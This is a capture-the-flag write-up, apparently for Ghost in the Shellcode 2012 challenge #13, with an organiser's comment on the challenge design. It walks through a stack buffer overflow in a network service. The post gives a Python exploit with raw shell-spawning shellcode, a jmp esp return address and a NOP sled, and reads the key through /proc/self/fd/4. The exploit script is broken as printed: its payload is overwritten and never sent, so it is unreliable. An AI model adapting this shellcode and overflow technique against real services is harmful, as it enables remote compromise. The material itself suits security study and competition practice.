Gits 2012 #13

File was running at : 2645

Summary: buffer overflow, reverse

File is a x86 ELF. First of all, it asks a password, but password could be anything except “HansBrix!!!”
And it has to be 0xc length.
Then, it is a usual buffer overflow task for warming up 
The main function has a buffer overflow.

signed int __cdecl check_func()
int flag; // edx@1
signed int result; // eax@1
char buffer[512]; // [sp+10h] [bp-208h]@1

memset(buffer, 0, sizeof(buffer));
SendToUser(fd, “Password: “);
ReadFromUser(fd, buffer, 0xCu, 10);
flag = strncmp(buffer, s2, 0xCu);
result = 1;
if (
flag )
SendToUser(fd, “Welcome shitty wok, may a taka oda prez?\n”);
ReadFromUser(fd, buffer, 0x240u, 0xAu);
SendToUser(fd, “Goddamn Mongorians! Quit breakin down my shitty wall!!!\n”);
result = 0;

And that is the exploit.

from socket import create_connection
import sys
import re
import time
if __name__ == "__main__":
   sock = create_connection(('', 2645))
   print sock.recv(1024)
   fake = sys.stdin.readline()
   print sock.recv(1024)
   #0xbfe86d0c - ret addr
   payload =  "\x6A\x05\x5F\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a"
   payload += "\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
   payload += "\x89\xe3\x52\x53\x89\xe1\xcd\x80"
   #08048853 - jmp esp
   ret2 = '\x53\x88\x04\x08'
   buff = b'\x90'*(0x1fc-len(payload)) + payload + b'\x90'*0x10 + ret2 + payload + b'\x0a'
   buff =  b'ls -la' + b'\x0a'
   print sock.recv(1024)

But when you take shell it is a problem to find a key. Instead of key I found that photo of pretty guy from PPP :)

If you need a real key, you have to see a handle of open key file. Something like that =)

cat /proc/self/fd/4


1 comment

    • Jordan on February 6, 2012 at 10:04
    • Reply

    In hindsight, we should have had it chrooted w/o proc and we should not have had the “new” key overlay mounted over the old one. That confused too many people. You did correctly find the open handle which was exactly the point, but the intention was to have folks write shellcode to use the parent’s FD and read the key that way.

    In hindsight, we think we should have just had the binary run as root, open the file (only readable by root), drop-privs, then listen on the socket (also chroot so no /proc).

    That would have forced people to achieve what we were hoping for and made it less of an easter-egg hunt as to what the goal was.

    One bit of trivia: this was a hat-tip to the original kimjongd binary from Defcon Finals in 2007. It’s also got a sneaky reference in the IDA Pro book by Chris Eagle.

Leave a Reply

Your email address will not be published.